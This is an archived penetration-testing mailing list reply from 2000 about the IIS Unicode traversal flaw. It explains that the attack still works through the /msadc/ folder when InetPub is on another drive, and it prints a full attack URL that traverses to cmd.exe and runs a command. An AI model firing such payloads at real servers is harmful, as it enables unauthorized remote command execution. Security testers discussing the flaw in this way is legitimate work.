Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings

From: Michael Owen <mowen () COSTCO COM>
Date: Mon, 30 Oct 2000 11:22:47 -0800

In our test, the InetPub directory is in logical drive D: instead of default
C:.
Does that matter in the above examples?
-------------------------------------


In our internal tests, it does, and the exploit won't work. BUT, if you use
the /msadc/ virtual folder, it won't matter, as msadc is in c:\program
files\Common\....


http://iisbox/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt
/system32/cmd.exe\?/c\+dir+c:\\temp






----------------------------------
Michael Owen
Costco Wholesale
Network Security
(425) 313-2957

Current thread:

[PEN-TEST] IIS UNICODE Strings Mike Ahern (Oct 31)
- Re: [PEN-TEST] IIS UNICODE Strings Erick Arturo Perez Huemer (Oct 31)
- <Possible follow-ups>
- Re: [PEN-TEST] IIS UNICODE Strings Michael Owen (Oct 31)
- Re: [PEN-TEST] IIS UNICODE Strings Daniel Docekal (Oct 31)